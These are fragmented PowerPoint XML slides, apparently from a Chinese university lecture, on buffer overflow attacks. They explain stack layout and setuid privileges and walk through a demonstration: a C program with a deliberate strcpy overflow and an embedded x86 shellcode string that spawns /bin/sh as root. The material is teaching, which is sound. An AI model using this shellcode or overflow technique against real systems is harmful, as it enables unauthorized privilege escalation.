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5F2-4A0B-4554-B761-B42AC239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BC3-2507-4C11-A000-07CF02A8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355-D3D0-4BFD-BE41-E76C17F0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63E-7169-4B86-941A-75D97E28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37A-9696-40BB-9BC1-78D9D3DA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071-EC04-4575-9D4C-328E960E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B34-C574-4694-8118-7A381CF5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2CB-2BB3-43AB-B39A-9586CA9A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16E-4714-444F-90D7-863E0CF7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33F-6349-48AB-9B44-95A6B551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E8A-4EBF-4AEC-B577-53F1C358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03A-5E13-416A-BC9F-0A575F3A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2560" y="3232080"/>
            <a:ext cx="7775640" cy="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top01.jpg"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:lum contrast="28000"/>
          </a:blip>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5486400"/>
            <a:ext cx="9144000" cy="13604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校徽_300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校名_蓝色"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="971640" y="298440"/>
            <a:ext cx="3168720" cy="45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1552680"/>
            <a:ext cx="4724280" cy="75960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00b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7840" y="49320"/>
            <a:ext cx="42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University of Science and Technology of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FCAA-734A-4623-804F-14B0D16462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0EDE-E817-4723-9347-26F3147339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1928880"/>
            <a:ext cx="87156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缓冲区溢出攻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3789360"/>
            <a:ext cx="34880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罗元福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B10005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攻击的基本原理 实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844640"/>
            <a:ext cx="29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 function(int a, int b, int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har buffer[14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m = a + b +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 = function(1,2,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调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函数时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配的空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右图所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363680"/>
            <a:ext cx="492300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攻击的基本原理 实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120" y="1844640"/>
            <a:ext cx="319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故意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uff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越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uffer[16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置开始填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ll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地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么返回地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会被覆盖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ll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地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么程序将不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返回到本该执行的地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而是调用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ll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11640" y="1363680"/>
            <a:ext cx="492300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具体的可以被攻击的实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800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13000"/>
            <a:ext cx="68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har *shellcode = "\x6a\x17\x58\x31\xdb\xcd\x80\x6a\x0b\x58\x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\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80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 bof(char *s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{        char buf[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*the following code has a buffer overflow problem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rcpy(buf,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 main(int argc, char **arg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{        if(argc != 2)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*print the address of shellcode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intf("0x%8.8x\n",shellcod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of(argv[1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intf("%s\n",argv[1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具体的可以被攻击的实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148360" y="1701720"/>
          <a:ext cx="3178080" cy="4140360"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="3178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返回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f[8-1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f[4-7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f[0-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5" name="箭头 67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="58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箭头 68"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="5084640"/>
            <a:ext cx="504720" cy="18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箭头 69"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4500720" y="4292640"/>
            <a:ext cx="576000" cy="144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箭头 70"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200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箭头 71"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200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566100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35040" y="562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9560" y="49482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7800" y="413856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42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26528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680" y="2016000"/>
            <a:ext cx="263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右图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o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函数分配的堆栈空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只需要将返回地址覆盖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ellcod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址即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开始攻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69600" y="2016000"/>
            <a:ext cx="33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ac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改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740736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开始攻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99280" y="1600200"/>
            <a:ext cx="144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3502080"/>
            <a:ext cx="8196480" cy="122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95200" y="22446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闭堆栈保护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开始攻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65280" y="2244600"/>
            <a:ext cx="43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行调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返回地址是否被覆盖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79675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开始攻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99280" y="1600200"/>
            <a:ext cx="144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81400" y="1989000"/>
            <a:ext cx="41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行调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现返回地址还未覆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8720" y="2854440"/>
            <a:ext cx="6692760" cy="29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开始攻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93360" y="1917720"/>
            <a:ext cx="60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行调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换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字符来填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查看返回地址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否被覆盖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86994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开始攻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99280" y="1600200"/>
            <a:ext cx="144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9720" y="1773360"/>
            <a:ext cx="64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行调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换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字符来填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b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经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覆盖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码用十六进制表示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1)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明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偏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字节开始是返回地址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5689440" cy="26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931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缓冲区溢出攻击是利用缓冲区溢出漏洞所进行的攻击行动。缓冲区溢出是一种非常普遍、非常危险的漏洞，在各种操作系统、应用软件中广泛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开始攻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99280" y="1600200"/>
            <a:ext cx="144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9800" y="2244600"/>
            <a:ext cx="646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llcod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地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简化起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在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输出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llcod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地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见代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. shellcod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址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0485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2720" y="3933720"/>
            <a:ext cx="7175520" cy="8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开始攻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99280" y="1600200"/>
            <a:ext cx="144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53720" y="2244600"/>
            <a:ext cx="728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uf[16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址开始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llcod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地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0485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是小端存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图获得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权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攻击成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3718080"/>
            <a:ext cx="804852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本攻击都是在较老的系统上进行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果在较新版本的操作系统上进行操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于操作系统自身采取的保护措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攻击不一定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举的例子是为了简化起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才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hellcod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代码放在程序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且在程序中自己输出其地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正攻击时必须自己构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847960" y="2781360"/>
            <a:ext cx="282888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33f05"/>
                  </a:solidFill>
                  <a:miter/>
                </a:ln>
                <a:gradFill rotWithShape="0">
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:srgbClr val="007cc3"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="b7683e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c3761">
                      <a:alpha val="50000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>Thank you</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="1" strike="noStrike">
              <a:ln w="9360">
                <a:solidFill>
                  <a:srgbClr val="733f05"/>
                </a:solidFill>
                <a:miter/>
              </a:ln>
              <a:gradFill rotWithShape="0">
                <a:gsLst>
                  <a:gs pos="0">
                    <a:srgbClr val="007cc3"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="b7683e"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="5400000"/>
              </a:gradFill>
              <a:effectLst>
                <a:outerShdw dist="153753" dir="2700000" blurRad="0" rotWithShape="0">
                  <a:srgbClr val="0c3761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缓冲区溢出攻击，可以导致程序运行失败、系统关机、重新启动等后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甚至是计算机被黑客占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个缓冲区溢出攻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Morri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蠕虫，发生在二十年前，它曾造成了全世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台网络服务器瘫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演示的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介绍如何利用缓冲区溢出漏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获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ll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而控制计算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使用具体的实例进行演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系统中由普通账户身份获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权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基本知识补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系统中的账户类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自己的理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普通账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的来宾用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账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账号是操作系统中拥有最高权限的账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权限被他人获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果不堪设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基本知识补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程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普通用户执行的时候能够暂时获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权限的进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我们能够在执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进程的时候让它转向去执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ll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么就获得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基本知识补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ll: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命令解释器，是提供给用户的编辑界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似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m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世界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shel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几乎是万能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获得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ll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能够控制这台计算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基本知识补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ll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段代码，执行后将会获取一个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示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\x6a\x17\x58\x31\xdb\xcd\x80\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80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tui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执行这段代码就能够获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oo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攻击的基本原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栈中的数组向高地址方向生长，当使用拷贝函数给数组变量赋值时，如果输入的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据长度超过数组申请的最大长度，则会出现输入数据向上覆盖直至当前函数返回地址的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假若精心构造一串数据，使其重写的返回地址值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lcod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地址，则程序会执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lcod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2T16:34:57Z</dcterms:created>
  <dc:creator>varellow</dc:creator>
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy>Microsoft</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2013-11-25T13:13:14Z</dcterms:modified>
  <cp:revision>5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